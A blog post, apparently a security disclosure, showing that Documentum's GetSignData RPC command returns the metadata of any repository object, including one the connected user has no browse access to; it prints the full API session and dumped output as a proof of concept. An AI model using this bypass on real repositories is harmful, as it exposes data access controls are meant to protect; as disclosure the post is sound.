Extra “protection” with trusted content services :)

Just to continue a theme about usefulness of TCS option mentioned in Some ideas about organising storage for content files.

GetSignData RPC-command is intended to verify digital signature of dm_audittrail:

API> retrieve,c,dm_audittrail
...
5f024be980000100
API> get,c,l,_sign_data
...
<audit-record>
<dctm-attr name="r_object_id" type="ID"><![CDATA[5f024be980000100]]></dctm-attr>
<dctm-attr name="event_name" type="STRING"><![CDATA[dm_logon_failure]]></dctm-attr>
<dctm-attr name="event_source" type="STRING"><![CDATA[System Unspecific]]></dctm-attr>
<dctm-attr name="r_gen_source" type="INT"><![CDATA[1]]></dctm-attr>
<dctm-attr name="user_name" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="audited_obj_id" type="ID"><![CDATA[11024be980000139]]></dctm-attr>
<dctm-attr name="time_stamp" type="TIME"><![CDATA[2015-05-05 15:24:19]]></dctm-attr>
<dctm-attr name="string_1" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="string_2" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="string_3" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="string_4" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="string_5" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="id_1" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="id_2" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="id_3" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="id_4" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="id_5" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="chronicle_id" type="ID"><![CDATA[11024be980000139]]></dctm-attr>
<dctm-attr name="object_name" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="version_label" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="object_type" type="STRING"><![CDATA[dm_user]]></dctm-attr>
<dctm-attr name="event_description" type="STRING"><![CDATA[Logon Failure]]></dctm-attr>
<dctm-attr name="policy_id" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="current_state" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="workflow_id" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="session_id" type="ID"><![CDATA[01024be980000123]]></dctm-attr>
<dctm-attr name="user_id" type="ID"><![CDATA[11024be980000139]]></dctm-attr>
<dctm-attr name="owner_name" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="acl_name" type="STRING"><![CDATA[dm_45024be98000021f]]></dctm-attr>
<dctm-attr name="acl_domain" type="STRING"><![CDATA[dm_bof_registry]]></dctm-attr>
<dctm-attr name="application_code" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="controlling_app" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="attribute_list" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="attribute_list_id" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
<dctm-attr name="audit_version" type="INT"><![CDATA[4]]></dctm-attr>
<dctm-attr name="host_name" type="STRING"><![CDATA[docu72dev01]]></dctm-attr>
<dctm-attr name="time_stamp_utc" type="TIME"><![CDATA[2015-05-05 12:24:19]]></dctm-attr>
<dctm-attr name="i_audited_obj_class" type="INT"><![CDATA[2]]></dctm-attr>
<dctm-attr name="registry_id" type="ID"><![CDATA[26024be980000100]]></dctm-attr>
<dctm-attr name="audited_obj_vstamp" type="INT"><![CDATA[1]]></dctm-attr>
<dctm-attr name="attribute_list_old" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="attribute_list_aspect_id" type="ID"><![CDATA[0000000000000000]]></dctm-attr>
</audit-record>

it real life it may be used to retrieve metadata of any object in repository regardless it’s security settings:

API> create,c,dm_document
...
09024be980526275
API> grant,c,l,dm_world,AccessPermit,,1
...
OK
API> save,c,l
...
OK
API> connect,DCTM_DEV,test_user,test_user
...
s1
API> fetch,c,09024be980526275
...
[DM_API_E_EXIST]error:  "Document/object specified by 09024be980526275 does not exist."

[DM_SYSOBJECT_E_NO_BROWSE_ACCESS]error:  "No browse access for sysobject with ID '09024be980526275'."


API> apply,c,09024be980526275,GetSignData
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : <audit-record>
<dctm-attr name="r_object_id" type="ID"><![CDATA[09024be980526275]]></dctm-attr>
<dctm-attr name="object_name" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="r_object_type" type="STRING"><![CDATA[dm_document]]></dctm-attr>
<dctm-attr name="title" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="subject" type="STRING"><![CDATA[]]></dctm-attr>
<dctm-attr name="authors" type="STRING" repeating="true" index="0"><![CDATA[]]></dctm-attr>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s